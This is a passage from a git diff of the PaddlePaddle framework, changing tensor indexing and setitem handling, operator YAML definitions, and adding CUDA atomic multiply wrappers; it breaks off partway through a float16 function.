cast(mean_, org_dtype); - variance = cast(variance, org_dtype); } return 
std::make_tuple(out, mean_, variance); diff --git a/paddle/fluid/pybind/CMakeLists.txt b/paddle/fluid/pybind/CMakeLists.txt index 5306d282e797ca..8a70396bddee6e 100755 --- a/paddle/fluid/pybind/CMakeLists.txt +++ b/paddle/fluid/pybind/CMakeLists.txt @@ -287,7 +287,7 @@ if(WITH_PYTHON) eager_legacy_op_function_generator.cc) set(GENERATOR_DEPS ${PYBIND_DEPS}) list(REMOVE_DUPLICATES GENERATOR_DEPS) - if(NOT WITH_ARM) + if(WIN32) list(REMOVE_ITEM GENERATOR_DEPS python) endif() target_link_libraries(eager_legacy_op_function_generator ${GENERATOR_DEPS}) diff --git a/paddle/fluid/pybind/eager_method.cc b/paddle/fluid/pybind/eager_method.cc index 48a8fdc8daa700..617ed37f6fd816 100644 --- a/paddle/fluid/pybind/eager_method.cc +++ b/paddle/fluid/pybind/eager_method.cc @@ -54,6 +54,7 @@ typedef SSIZE_T ssize_t; #pragma GCC diagnostic ignored "-Wmissing-field-initializers" #include "paddle/common/ddim.h" #include "paddle/fluid/eager/amp_utils.h" +#include "paddle/fluid/eager/api/generated/eager_generated/backwards/nodes.h" #include "paddle/fluid/eager/api/generated/eager_generated/forwards/dygraph_functions.h" #include "paddle/fluid/eager/eager_amp_auto_cast.h" #include "paddle/fluid/framework/python_headers.h" @@ -1361,6 +1362,7 @@ static PyObject* tensor__getitem_dygraph(TensorObject* self, &use_strided_slice); // step2: Dealing with basic indexing + bool out_is_view = false; auto out = getTensorWithBasicIndexing(tensor, &slice_axes, &slice_starts, @@ -1369,7 +1371,8 @@ static PyObject* tensor__getitem_dygraph(TensorObject* self, &decrease_axis, &none_axes, &infer_flags, - &use_strided_slice); + &use_strided_slice, + &out_is_view); if (!has_advanced_index) { return ToPyObject(out); @@ -1377,7 +1380,7 @@ static PyObject* tensor__getitem_dygraph(TensorObject* self, // step3: Dealing with advanced indexing std::vector transed_index; - std::vector trans_back_dim; + std::vector trans_back_dim, trans_dim; int pos_of_new_dim = INT_MAX, rank_of_new_dim = 1; paddle::Tensor transed_tensor = dealWithAdvancedIndex(out, @@ -1387,7 +1390,9 @@ static PyObject* tensor__getitem_dygraph(TensorObject* self, &transed_index, &trans_back_dim, &pos_of_new_dim, - &rank_of_new_dim); + &rank_of_new_dim, + &trans_dim, + &out_is_view); if (transed_index.size() == 1 && transed_index[0].dtype() == phi::DataType::BOOL) { @@ -1417,14 +1422,14 @@ static PyObject* tensor__getitem_dygraph(TensorObject* self, if (pos_of_new_dim != 0) { std::vector perm(out.shape().size(), 0); - int tmp1 = pos_of_new_dim, tmp2 = 0, + int tmp1 = rank_of_new_dim, tmp2 = 0, tmp3 = pos_of_new_dim + rank_of_new_dim; for (int i = 0; i < static_cast(out.shape().size()); ++i) { - if (i < rank_of_new_dim) { + if (i < pos_of_new_dim) { perm[i] = - tmp1++; // range(pos_of_new_dim, pos_of_new_dim + rank_of_new_dim) - } else if (i >= rank_of_new_dim && i < pos_of_new_dim + rank_of_new_dim) { - perm[i] = tmp2++; // range(0, pos_of_new_dim) + tmp1++; // range(rank_of_new_dim, pos_of_new_dim + rank_of_new_dim) + } else if (i >= pos_of_new_dim && i < pos_of_new_dim + rank_of_new_dim) { + perm[i] = tmp2++; // range(0, rank_of_new_dim) } else { perm[i] = tmp3++; // range(pos_of_new_dim + rank_of_new_dim, out.ndim) } @@ -1609,12 +1614,9 @@ static PyObject* tensor__setitem_dygraph(TensorObject* self, &use_strided_slice); // step2: Parse values - PADDLE_ENFORCE( - PyCheckTensor(value_obj), - platform::errors::InvalidArgument("The value must be a Tensor")); - + std::vector values; paddle::Tensor value_tensor = - reinterpret_cast(value_obj)->tensor; + dealWithValues(tensor, 
value_obj, &values, has_advanced_index); if (!has_advanced_index) { // use set_value OP if there is no advanced index @@ -1622,45 +1624,60 @@ static PyObject* tensor__setitem_dygraph(TensorObject* self, // Release gil and do tracing py::gil_scoped_release release; // use inplace set_value_ operator - if (value_tensor.initialized() && - (self->tensor.dtype() != value_tensor.dtype())) { - if (egr::Controller::Instance().GetAMPLevel() != - paddle::imperative::AmpLevel::O0) { - paddle::small_vector, - egr::kSlotSmallVectorSize> - tmps = {{self->tensor}, {value_tensor}}; - auto amp_dtype = egr::GetAmpDestDtype("set_value", tmps); - self->tensor = egr::EagerAmpAutoCast( - self->tensor.name(), self->tensor, amp_dtype, "set_value"); - value_tensor = egr::EagerAmpAutoCast( - value_tensor.name(), value_tensor, amp_dtype, "set_value"); - } + if (value_tensor.initialized()) { if (self->tensor.dtype() != value_tensor.dtype()) { - value_tensor = cast_ad_func(value_tensor, self->tensor.dtype()); + if (egr::Controller::Instance().GetAMPLevel() != + paddle::imperative::AmpLevel::O0) { + paddle::small_vector, + egr::kSlotSmallVectorSize> + tmps = {{self->tensor}, {value_tensor}}; + auto amp_dtype = egr::GetAmpDestDtype("set_value", tmps); + self->tensor = egr::EagerAmpAutoCast( + self->tensor.name(), self->tensor, amp_dtype, "set_value"); + value_tensor = egr::EagerAmpAutoCast( + value_tensor.name(), value_tensor, amp_dtype, "set_value"); + } + if (self->tensor.dtype() != value_tensor.dtype()) { + value_tensor = cast_ad_func(value_tensor, self->tensor.dtype()); + } } - } - // step3.1: Only basic indexing, use OP set_value. - const phi::distributed::ProcessMesh* mesh = nullptr; - if (InputsContainDistTensor(&mesh, self->tensor, value_tensor)) { - ConvertAllInputsToDistTensor(mesh, self->tensor, value_tensor); - } - self->tensor = set_value_with_tensor__ad_func(self->tensor, - value_tensor, - slice_starts, - slice_ends, - slice_strides, - slice_axes, - decrease_axis, - none_axes); - if (PyCheckTensor(value_obj)) { - // pass the stop_gradient from value to tensor. - // pass stop gradient should be done after CheckInplace in - // set_value__dygraph_function. - if (!egr::EagerUtils::autograd_meta(&value_tensor)->StopGradient() && - egr::EagerUtils::autograd_meta(&self->tensor)->StopGradient()) { - egr::EagerUtils::autograd_meta(&self->tensor)->SetStopGradient(false); + // step3.1: Only basic indexing, use OP set_value. + const phi::distributed::ProcessMesh* mesh = nullptr; + if (InputsContainDistTensor(&mesh, self->tensor, value_tensor)) { + ConvertAllInputsToDistTensor(mesh, self->tensor, value_tensor); } + self->tensor = set_value_with_tensor__ad_func(self->tensor, + value_tensor, + slice_starts, + slice_ends, + slice_strides, + slice_axes, + decrease_axis, + none_axes); + if (PyCheckTensor(value_obj)) { + // pass the stop_gradient from value to tensor. + // pass stop gradient should be done after CheckInplace in + // set_value__dygraph_function. 
+ if (!egr::EagerUtils::autograd_meta(&value_tensor)->StopGradient() && + egr::EagerUtils::autograd_meta(&self->tensor)->StopGradient()) { + egr::EagerUtils::autograd_meta(&self->tensor)->SetStopGradient(false); + } + } + } else { + const phi::distributed::ProcessMesh* mesh = nullptr; + if (InputsContainDistTensor(&mesh, self->tensor)) { + ConvertAllInputsToDistTensor(mesh, self->tensor); + } + self->tensor = set_value__ad_func(self->tensor, + slice_starts, + slice_ends, + slice_strides, + slice_axes, + decrease_axis, + none_axes, + {1}, + values); } } else { // step3.2: Case for there are advanced indexing. @@ -1670,6 +1687,7 @@ static PyObject* tensor__setitem_dygraph(TensorObject* self, // 3. assign values to the sliced result by index_put OP; // 4. transpose back and assign the result to original tensor by set_value // OP. + bool out_is_view = false; paddle::Tensor sub_tensor = getTensorWithBasicIndexing(tensor, &slice_axes, &slice_starts, @@ -1678,12 +1696,13 @@ static PyObject* tensor__setitem_dygraph(TensorObject* self, &decrease_axis, &none_axes, &infer_flags, - &use_strided_slice); + &use_strided_slice, + &out_is_view); std::vector transed_index; - std::vector trans_back_dim; + std::vector trans_back_dim, trans_dim; - int pos_of_new_dim = 0, rank_of_new_dim = 0; + int pos_of_new_dim = INT_MAX, rank_of_new_dim = 1; paddle::Tensor transed_sub_tensor = dealWithAdvancedIndex(sub_tensor, @@ -1693,61 +1712,127 @@ static PyObject* tensor__setitem_dygraph(TensorObject* self, &transed_index, &trans_back_dim, &pos_of_new_dim, - &rank_of_new_dim); + &rank_of_new_dim, + &trans_dim, + &out_is_view); // Release gil and do tracing py::gil_scoped_release release; - - if (value_tensor.initialized() && - (self->tensor.dtype() != value_tensor.dtype())) { - if (egr::Controller::Instance().GetAMPLevel() != - paddle::imperative::AmpLevel::O0) { - paddle::small_vector, - egr::kSlotSmallVectorSize> - tmps = {{self->tensor}, {value_tensor}}; - auto amp_dtype = egr::GetAmpDestDtype("index_put", tmps); - self->tensor = egr::EagerAmpAutoCast( - self->tensor.name(), self->tensor, amp_dtype, "index_put"); - value_tensor = egr::EagerAmpAutoCast( - value_tensor.name(), value_tensor, amp_dtype, "index_put"); - } + if (value_tensor.initialized()) { if (self->tensor.dtype() != value_tensor.dtype()) { - value_tensor = cast_ad_func(value_tensor, self->tensor.dtype()); + if (egr::Controller::Instance().GetAMPLevel() != + paddle::imperative::AmpLevel::O0) { + paddle::small_vector, + egr::kSlotSmallVectorSize> + tmps = {{self->tensor}, {value_tensor}}; + auto amp_dtype = egr::GetAmpDestDtype("index_put", tmps); + self->tensor = egr::EagerAmpAutoCast( + self->tensor.name(), self->tensor, amp_dtype, "index_put"); + value_tensor = egr::EagerAmpAutoCast( + value_tensor.name(), value_tensor, amp_dtype, "index_put"); + } + if (self->tensor.dtype() != value_tensor.dtype()) { + value_tensor = cast_ad_func(value_tensor, self->tensor.dtype()); + } } - } - // TODO(zoooo0820) 1.Using inplace version index_put - // 2.Remove following code after backward bug fixed. 
- transed_sub_tensor = assign_ad_func(transed_sub_tensor); + if (value_tensor.dims().size() > 1 && pos_of_new_dim != 0) { + value_tensor = transpose_ad_func(value_tensor, trans_dim); + } - const phi::distributed::ProcessMesh* mesh = nullptr; - if (InputsContainDistTensor( - &mesh, self->tensor, transed_sub_tensor, value_tensor)) { - ConvertAllInputsToDistTensor( - mesh, self->tensor, transed_sub_tensor, value_tensor); - } + const phi::distributed::ProcessMesh* mesh = nullptr; + if (InputsContainDistTensor( + &mesh, self->tensor, transed_sub_tensor, value_tensor)) { + ConvertAllInputsToDistTensor( + mesh, self->tensor, transed_sub_tensor, value_tensor); + } - transed_sub_tensor = - index_put_ad_func(transed_sub_tensor, transed_index, value_tensor); - - paddle::Tensor transback_sub_tensor = - transpose_ad_func(transed_sub_tensor, trans_back_dim); - - self->tensor = set_value_with_tensor__ad_func(self->tensor, - transback_sub_tensor, - slice_starts, - slice_ends, - slice_strides, - slice_axes, - decrease_axis, - none_axes); - if (PyCheckTensor(value_obj)) { - // pass the stop_gradient from value to tensor. - // pass stop gradient should be done after CheckInplace in - // set_value__dygraph_function. - if (!egr::EagerUtils::autograd_meta(&value_tensor)->StopGradient() && - egr::EagerUtils::autograd_meta(&self->tensor)->StopGradient()) { - egr::EagerUtils::autograd_meta(&self->tensor)->SetStopGradient(false); + if (transed_index.size() == 1 && + transed_index[0].dtype() == phi::DataType::BOOL && + transed_index[0].shape().size() == self->tensor.shape().size()) { + if (value_tensor.shape() != self->tensor.shape()) { + value_tensor = expand_ad_func(value_tensor, self->tensor.shape()); + } + transed_sub_tensor = + where__ad_func(logical_not_ad_func(transed_index[0]), + transed_sub_tensor, + value_tensor); + } else { + transed_sub_tensor = + index_put__ad_func(transed_sub_tensor, transed_index, value_tensor); + } + + if (out_is_view) { + // NOTE(zoooo0820): if out_is_view is true, it is a case of + // combined-indexing setitem, i.e. firstly we get a view of + // self->tensor, then modified it with inplace api index_put_ For now, + // in design of Paddle, the forward result is right. But the backward + // edge can not be established because the Base Tensor cannot sense + // whether it has been modified by other operations. Following codes are + // to add a new node (set_value_with_tensor_grad) to record the backward + // edge, with out ad_function which needs to do the forward calculation. + + egr::AutogradMeta* x_autograd_meta = + egr::EagerUtils::nullable_autograd_meta(self->tensor); + egr::AutogradMeta* values_autograd_meta = + egr::EagerUtils::nullable_autograd_meta(transed_sub_tensor); + bool trace_backward = egr::Controller::Instance().HasGrad(); + bool require_any_grad = egr::EagerUtils::ComputeRequireGrad( + trace_backward, x_autograd_meta, values_autograd_meta); + // Node Declaration + std::shared_ptr grad_node; + // Set grad_node before API Call + if (require_any_grad) { + paddle::Tensor transback_sub_tensor = + transpose_ad_func(transed_sub_tensor, trans_back_dim); + const auto& values_tmp = + (require_any_grad && transback_sub_tensor.is_dense_tensor() && + !std::dynamic_pointer_cast( + transback_sub_tensor.impl()) + ->meta() + .is_contiguous()) + ? 
paddle::Tensor( + std::make_shared( + std::move(paddle::experimental::Trans2Contiguous( + *(std::dynamic_pointer_cast( + transback_sub_tensor.impl()))))), + transback_sub_tensor.mutable_autograd_meta()) + : transback_sub_tensor; + + grad_node = std::shared_ptr( + new SetValueWithTensorGradNode(1, 2)); // NOLINT + grad_node->SetAttributestarts(slice_starts); + grad_node->SetAttributeends(slice_ends); + grad_node->SetAttributesteps(slice_strides); + grad_node->SetAttributeaxes(slice_axes); + grad_node->SetAttributedecrease_axes(decrease_axis); + grad_node->SetAttributenone_axes(none_axes); + grad_node->SetTensorWrappervalues(values_tmp); + + paddle::memory::LogDeviceMemoryStats( + egr::Controller::Instance().GetExpectedPlace(), + "set_value_with_tensor"); + egr::EagerUtils::CheckInplace( + self->tensor, x_autograd_meta, require_any_grad); + egr::EagerUtils::PassStopGradient(false, x_autograd_meta); + // SetGradOutMeta & SetEdges + grad_node->SetGradOutMeta(self->tensor, 0); + grad_node->SetGradOutMeta(transback_sub_tensor, 1); + if (x_autograd_meta) { + egr::EagerUtils::SetOutRankWithSlot(x_autograd_meta, 0); + egr::EagerUtils::SetHistory(x_autograd_meta, grad_node); + } + grad_node->SetGradInMeta(self->tensor, 0); + } + } + if (PyCheckTensor(value_obj)) { + // pass the stop_gradient from value to tensor. + // pass stop gradient should be done after CheckInplace in + // set_value__dygraph_function. + if (!egr::EagerUtils::autograd_meta(&value_tensor)->StopGradient() && + egr::EagerUtils::autograd_meta(&self->tensor)->StopGradient()) { + egr::EagerUtils::autograd_meta(&self->tensor)->SetStopGradient(false); + } } } } diff --git a/paddle/fluid/pybind/inference_api.cc b/paddle/fluid/pybind/inference_api.cc index 1db2ab7f871c69..20e644c11919ff 100644 --- a/paddle/fluid/pybind/inference_api.cc +++ b/paddle/fluid/pybind/inference_api.cc @@ -800,7 +800,7 @@ void BindAnalysisConfig(py::module *m) { &AnalysisConfig::EnableXpu, py::arg("l3_size") = 16 * 1024 * 1024, py::arg("l3_locked") = false, - py::arg("conv_autotune") = true, + py::arg("conv_autotune") = false, py::arg("conv_autotune_file") = "", py::arg("transformer_encoder_precision") = "int16", py::arg("transformer_encoder_adaptive_seqlen") = false, diff --git a/paddle/fluid/pybind/slice_utils.h b/paddle/fluid/pybind/slice_utils.h index 918d2eeae4272a..919a3a4650d3e7 100644 --- a/paddle/fluid/pybind/slice_utils.h +++ b/paddle/fluid/pybind/slice_utils.h @@ -26,9 +26,11 @@ #include "paddle/fluid/framework/convert_utils.h" #include "paddle/fluid/framework/scope_guard.h" #include "paddle/fluid/operators/utils.h" +#include "paddle/fluid/pybind/tensor_py.h" #include "paddle/phi/common/data_type.h" #include "paddle/phi/core/compat/convert_utils.h" #include "paddle/phi/core/dense_tensor.h" +#include "pybind11/numpy.h" #include "pybind11/pybind11.h" #include "pybind11/stl.h" @@ -345,11 +347,13 @@ static paddle::Tensor getTensorWithBasicIndexing( std::vector* decrease_axis, std::vector* none_axes, std::vector* infer_flags, - bool* use_strided_slice) { + bool* use_strided_slice, + bool* out_is_view) { paddle::Tensor out; if (slice_axes->empty()) { out = tensor; } else { + *out_is_view = true; if (!(*use_strided_slice)) { eager_gil_scoped_release guard; out = slice_ad_func(tensor, @@ -370,6 +374,7 @@ static paddle::Tensor getTensorWithBasicIndexing( } } if (!none_axes->empty()) { + *out_is_view = true; eager_gil_scoped_release guard; // Deal with cases that decrease_axes is not empty // For example: @@ -397,9 +402,9 @@ static paddle::Tensor 
dealWithAdvancedIndex( std::vector* transed_index, std::vector* trans_back_dim, int* pos_of_new_dim, - int* rank_of_new_dim) { - std::vector trans_dim; - + int* rank_of_new_dim, + std::vector* trans_dim, + bool* out_is_view) { int p = 0; for (size_t i = 0; i < advanced_index_dim->size(); ++i) { auto index_dim = (*advanced_index_dim)[i]; @@ -408,30 +413,28 @@ static paddle::Tensor dealWithAdvancedIndex( // advanced_index_dim auto index = (*advanced_index)[p++]; - if (!is_for_setitem) { - if (index_dim == 0) { - // case 1: advanced indices at axis 0, the new dim will be at first. - *pos_of_new_dim = 0; - } else if (index_dim > 0 && trans_dim.size() > 0 && - trans_dim[trans_dim.size() - 1] != index_dim - 1) { - // case 2: there are not adjacent advanced indices, the new dim will - // be at first. - *pos_of_new_dim = 0; - } else { - *pos_of_new_dim = std::min(index_dim, *pos_of_new_dim); - } - *rank_of_new_dim = - std::max(*rank_of_new_dim, static_cast(index.shape().size())); + if (index_dim == 0) { + // case 1: advanced indices at axis 0, the new dim will be at first. + *pos_of_new_dim = 0; + } else if (index_dim > 0 && trans_dim->size() > 0 && + (*trans_dim)[trans_dim->size() - 1] != index_dim - 1) { + // case 2: there are not adjacent advanced indices, the new dim will + // be at first. + *pos_of_new_dim = 0; + } else { + *pos_of_new_dim = std::min(index_dim, *pos_of_new_dim); } + *rank_of_new_dim = + std::max(*rank_of_new_dim, static_cast(index.shape().size())); - trans_dim.push_back(index_dim); + trans_dim->push_back(index_dim); transed_index->push_back(std::move(index)); } } for (size_t i = 0; i < tensor.shape().size(); ++i) { if ((*advanced_index_dim)[i] == -1) { - trans_dim.push_back(i); + trans_dim->push_back(i); } } @@ -441,19 +444,20 @@ static paddle::Tensor dealWithAdvancedIndex( std::vector original_dim_order(tensor.shape().size()); std::iota(original_dim_order.begin(), original_dim_order.end(), 0); - if (original_dim_order == trans_dim) { + if (original_dim_order == *trans_dim) { transed_tensor = tensor; } else { - transed_tensor = transpose_ad_func(tensor, trans_dim); + *out_is_view = true; + transed_tensor = transpose_ad_func(tensor, *trans_dim); } if (is_for_setitem) { - trans_back_dim->resize(trans_dim.size()); + trans_back_dim->resize(trans_dim->size()); std::iota(trans_back_dim->begin(), trans_back_dim->end(), 0); std::sort(trans_back_dim->begin(), trans_back_dim->end(), [&trans_dim](int left, int right) { - return trans_dim[left] < trans_dim[right]; + return (*trans_dim)[left] < (*trans_dim)[right]; }); } return transed_tensor; @@ -511,5 +515,104 @@ static void ParseBoolAndBroadcastIndices( } } +static paddle::Tensor dealWithValues(const paddle::Tensor& tensor, + PyObject* value_obj, + std::vector* values, + const bool trans_to_tensor) { + paddle::Tensor value_tensor; + if (PyCheckTensor(value_obj)) { + value_tensor = reinterpret_cast(value_obj)->tensor; + } else if (py::isinstance(value_obj)) { + paddle::Tensor value_tensor_tmp( + std::make_shared(), + egr::Controller::Instance().GenerateUniqueName()); + py::object value_obj_tmp(py::handle(value_obj), true); + py::object value = value_obj_tmp; + if (tensor.dtype() == phi::DataType::FLOAT32) { + if (!py::isinstance>(value_obj_tmp)) { + value = pybind11::detail::CastNumpyArray(value_obj_tmp); + } + } else if (tensor.dtype() == phi::DataType::FLOAT64) { + if (!py::isinstance>(value_obj_tmp)) { + value = pybind11::detail::CastNumpyArray(value_obj_tmp); + } + } else if (tensor.dtype() == phi::DataType::INT32) { + if 
(!py::isinstance>(value_obj_tmp)) { + value = pybind11::detail::CastNumpyArray(value_obj_tmp); + } + } else if (tensor.dtype() == phi::DataType::INT64) { + if (!py::isinstance>(value_obj_tmp)) { + value = pybind11::detail::CastNumpyArray(value_obj_tmp); + } + } else if (tensor.dtype() == phi::DataType::BOOL) { + if (!py::isinstance>(value_obj_tmp)) { + value = pybind11::detail::CastNumpyArray(value_obj_tmp); + } + } else if (tensor.dtype() == phi::DataType::COMPLEX64) { + if (!py::isinstance>>(value_obj_tmp)) { + value = pybind11::detail::CastNumpyArray>( + value_obj_tmp); + } + } else if (tensor.dtype() == phi::DataType::COMPLEX128) { + if (!py::isinstance>>(value_obj_tmp)) { + value = pybind11::detail::CastNumpyArray>( + value_obj_tmp); + } + } else { + PADDLE_THROW(platform::errors::InvalidArgument( + "When assign a numpy.np value to a paddle.Tensor, " + "the data type of the paddle.Tensor must be bool, " + "float32, float64, complex64, complex128, int32 or int64, " + "please check the type of tensor.")); + } + SetTensorFromPyArray( + static_cast(value_tensor_tmp.impl().get()), + value, + tensor.place(), + false); + value_tensor = value_tensor_tmp; + } else { + py::object value_obj_tmp(py::handle(value_obj), true); + // convert the value to self data type + if (py::isinstance(value_obj_tmp) || + py::isinstance(value_obj_tmp) || + py::isinstance(value_obj_tmp) || + PyComplex_Check(value_obj)) { + if (tensor.dtype() == phi::DataType::FLOAT32 || + tensor.dtype() == phi::DataType::FLOAT16 || + tensor.dtype() == phi::DataType::BFLOAT16) { + values->push_back(value_obj_tmp.cast()); + } else if (tensor.dtype() == phi::DataType::FLOAT64) { + values->push_back(value_obj_tmp.cast()); + } else if (tensor.dtype() == phi::DataType::INT32 || + tensor.dtype() == phi::DataType::INT16 || + tensor.dtype() == phi::DataType::INT8 || + tensor.dtype() == phi::DataType::UINT8) { + values->push_back(value_obj_tmp.cast()); + } else if (tensor.dtype() == phi::DataType::INT64) { + values->push_back(value_obj_tmp.cast()); + } else if (tensor.dtype() == phi::DataType::BOOL) { + values->push_back(value_obj_tmp.cast()); + } else if (tensor.dtype() == phi::DataType::COMPLEX64) { + values->push_back(value_obj_tmp.cast>()); + } else if (tensor.dtype() == phi::DataType::COMPLEX128) { + values->push_back(value_obj_tmp.cast>()); + } + } else { + PADDLE_THROW(platform::errors::InvalidArgument( + "Value type error. 
The assign value allows " + "Tensor, numpy.ndarray, integer, float, complex or bool, " + "but received %s.", + Py_TYPE(value_obj))); + } + + if (trans_to_tensor) { + value_tensor = + full_ad_func({1}, (*values)[0], tensor.dtype(), tensor.place()); + } + } + return value_tensor; +} + } // namespace pybind } // namespace paddle diff --git a/paddle/phi/api/yaml/backward.yaml b/paddle/phi/api/yaml/backward.yaml index 3a87826337465b..81339a24c50de8 100644 --- a/paddle/phi/api/yaml/backward.yaml +++ b/paddle/phi/api/yaml/backward.yaml @@ -944,8 +944,6 @@ func : gather_nd_grad composite : gather_nd_grad(x, index, out_grad, x_grad) no_need_buffer : x - data_transform : - skip_transform : index - backward_op : gaussian_inplace_grad forward : gaussian_inplace(Tensor x, float mean=0, float std=1.0, int seed=0) -> Tensor(out) @@ -1762,8 +1760,8 @@ optional : boxes_num - backward_op : put_along_axis_grad - forward : put_along_axis (Tensor arr, Tensor indices, Tensor values, int axis, str reduce = "assign") -> Tensor(out) - args : (Tensor arr, Tensor indices, Tensor out_grad, int axis, str reduce) + forward : put_along_axis (Tensor arr, Tensor indices, Tensor values, int axis, str reduce = "assign", bool include_self = true) -> Tensor(out) + args : (Tensor arr, Tensor indices, Tensor values, Tensor out, Tensor out_grad, int axis, str reduce, bool include_self) output : Tensor(arr_grad), Tensor(values_grad) infer_meta : func : GeneralBinaryGradInferMeta diff --git a/paddle/phi/api/yaml/generator/dist_bw_api_gen.py b/paddle/phi/api/yaml/generator/dist_bw_api_gen.py index 3769155eb27e11..c7ec9ace290ac7 100644 --- a/paddle/phi/api/yaml/generator/dist_bw_api_gen.py +++ b/paddle/phi/api/yaml/generator/dist_bw_api_gen.py @@ -425,6 +425,7 @@ def source_include(header_file_path, fw_header_file_path): #include "{fw_header_file_path}" #include "paddle/phi/infermeta/backward.h" #include "paddle/phi/infermeta/unary.h" +#include "paddle/phi/infermeta/fusion.h" #include "paddle/phi/api/profiler/event_tracing.h" #include "paddle/phi/api/profiler/supplement_tracing.h" diff --git a/paddle/phi/api/yaml/legacy_backward.yaml b/paddle/phi/api/yaml/legacy_backward.yaml index 04cf57a88bb7cb..3f11781dfe88eb 100755 --- a/paddle/phi/api/yaml/legacy_backward.yaml +++ b/paddle/phi/api/yaml/legacy_backward.yaml @@ -614,14 +614,14 @@ - backward_op : set_value_grad forward : set_value (Tensor x, IntArray starts, IntArray ends, IntArray steps, int64_t[] axes, int64_t[] decrease_axes, int64_t[] none_axes, int64_t[] shape, Scalar[] values) -> Tensor(out) - args : (Tensor out_grad) + args : (Tensor out_grad, IntArray starts, IntArray ends, IntArray steps, int64_t[] axes, int64_t[] decrease_axes, int64_t[] none_axes) output : Tensor(x_grad) infer_meta: func: UnchangedInferMeta param: [out_grad] kernel: - func: assign - param: [out_grad] + func: set_value_with_scalar_grad + param: [out_grad, starts, ends, steps, axes, decrease_axes, none_axes] - backward_op : set_value_with_tensor_grad forward: set_value_with_tensor (Tensor x, Tensor values, IntArray starts, IntArray ends, IntArray steps, int64_t[] axes, int64_t[] decrease_axes, int64_t[] none_axes) -> Tensor(out) diff --git a/paddle/phi/api/yaml/op_compat.yaml b/paddle/phi/api/yaml/op_compat.yaml index e4bbb15073f418..dfcdf65673e208 100755 --- a/paddle/phi/api/yaml/op_compat.yaml +++ b/paddle/phi/api/yaml/op_compat.yaml @@ -2432,7 +2432,7 @@ outputs : out : Result attrs : - {axis : Axis, reduce : Reduce} + {axis : Axis, reduce : Reduce, include_self: Include_self} - op : pylayer backward : 
pylayer_grad diff --git a/paddle/phi/api/yaml/ops.yaml b/paddle/phi/api/yaml/ops.yaml index 092b3d71a60b4d..efc1b17714a854 100644 --- a/paddle/phi/api/yaml/ops.yaml +++ b/paddle/phi/api/yaml/ops.yaml @@ -2032,7 +2032,7 @@ backward : psroi_pool_grad - op : put_along_axis - args : (Tensor arr, Tensor indices, Tensor values, int axis, str reduce = "assign") + args : (Tensor arr, Tensor indices, Tensor values, int axis, str reduce = "assign", bool include_self = true) output : Tensor(out) infer_meta : func : UnchangedInferMeta diff --git a/paddle/phi/backends/custom/custom_device.cc b/paddle/phi/backends/custom/custom_device.cc index 48bedd1bd939e4..ddbfc60f19f083 100644 --- a/paddle/phi/backends/custom/custom_device.cc +++ b/paddle/phi/backends/custom/custom_device.cc @@ -383,7 +383,7 @@ class CustomDevice : public DeviceInterface { void* ptr = nullptr; const auto device = &devices_pool[dev_id]; - if (!pimpl_->unified_memory_allocate) { + if (!pimpl_->host_memory_allocate) { PADDLE_THROW(phi::errors::Unavailable( "MemoryAllocateHost is not supported on %s.", Type())); } else { diff --git a/paddle/phi/backends/gpu/gpu_primitives.h b/paddle/phi/backends/gpu/gpu_primitives.h index 98ebea87eedfd8..03c33a221c4d3e 100644 --- a/paddle/phi/backends/gpu/gpu_primitives.h +++ b/paddle/phi/backends/gpu/gpu_primitives.h @@ -399,6 +399,182 @@ CUDA_ATOMIC_WRAPPER(Add, complex) { CudaAtomicAdd(imag, val.imag)); } +// For atomicMul. +CUDA_ATOMIC_WRAPPER(Mul, int) { + int res = *address, old = res; // NOLINT + do { + old = res; + res = atomicCAS(address, // NOLINT + old, // NOLINT + val * old); // NOLINT + } while (old != res); + return res; +} + +CUDA_ATOMIC_WRAPPER(Mul, unsigned int) { + unsigned int res = *address, old = res; // NOLINT + do { + old = res; + res = atomicCAS(address, // NOLINT + old, // NOLINT + val * old); // NOLINT + } while (old != res); + return res; +} +// CUDA API uses unsigned long long int, we cannot use uint64_t here. +// It because unsigned long long int is not necessarily uint64_t +CUDA_ATOMIC_WRAPPER(Mul, unsigned long long int) { // NOLINT + unsigned long long int old = *address, assumed; // NOLINT + + do { + assumed = old; + old = atomicCAS(address, assumed, val * assumed); + } while (assumed != old); + return old; +} + +CUDA_ATOMIC_WRAPPER(Mul, int64_t) { + // Here, we check long long int must be int64_t. 
+ static_assert(sizeof(int64_t) == sizeof(long long int), // NOLINT + "long long should be int64"); + long long int res = *address, old = res; // NOLINT + do { + old = res; + res = (long long int)atomicCAS( // NOLINT + (unsigned long long int *)address, // NOLINT + (unsigned long long int)old, // NOLINT + (unsigned long long int)val * (unsigned long long int)old); // NOLINT + } while (old != res); + return res; +} + +CUDA_ATOMIC_WRAPPER(Mul, float) { + int *const address_as_i = reinterpret_cast<int *>(address); + int old = *address_as_i, assumed; + + do { + assumed = old; + old = atomicCAS( + address_as_i, assumed, __float_as_int(val * __int_as_float(assumed))); + } while (assumed != old); + + return __int_as_float(old); +} + +CUDA_ATOMIC_WRAPPER(Mul, double) { + unsigned long long int *const address_as_ull = // NOLINT + reinterpret_cast<unsigned long long int *>(address); // NOLINT + unsigned long long int old = *address_as_ull, assumed; // NOLINT + + do { + assumed = old; + + old = atomicCAS(address_as_ull, + assumed, + __double_as_longlong(val * __longlong_as_double(assumed))); + } while (assumed != old); + + return __longlong_as_double(old); +} + +#ifdef PADDLE_CUDA_FP16 +inline static __device__ uint32_t mul_to_low_half(uint32_t val, float x) { + phi::dtype::float16 low_half; + // The float16 in lower 16bits + low_half.x = static_cast<uint16_t>(val & 0xFFFFu); + low_half = static_cast<phi::dtype::float16>(static_cast<float>(low_half) * x); + return (val & 0xFFFF0000u) | low_half.x; +} + +inline static __device__ uint32_t mul_to_high_half(uint32_t val, float x) { + phi::dtype::float16 high_half; + // The float16 in higher 16bits + high_half.x = static_cast<uint16_t>(val >> 16); + high_half = + static_cast<phi::dtype::float16>(static_cast<float>(high_half) * x); + return (val & 0xFFFFu) | (static_cast<uint32_t>(high_half.x) << 16); +} + +CUDA_ATOMIC_WRAPPER(Mul, phi::dtype::float16) { + if (*address >= val) { + return *address; + } + uint32_t *address_as_ui = reinterpret_cast<uint32_t *>( + reinterpret_cast<char *>(address) - + (reinterpret_cast<uintptr_t>(address) & 0x02)); + float val_f = static_cast<float>(val); + uint32_t old = *address_as_ui; + uint32_t assumed; + if (((uintptr_t)address & 0x02) == 0) { + // The float16 value stays at the lower 16 bits of the address. + do { + assumed = old; + old = atomicCAS(address_as_ui, assumed, mul_to_low_half(assumed, val_f)); + } while (old != assumed); + phi::dtype::float16 ret; + ret.x = old & 0xFFFFu; + return ret; + } else { + // The float16 value stays at the higher 16 bits of the address.
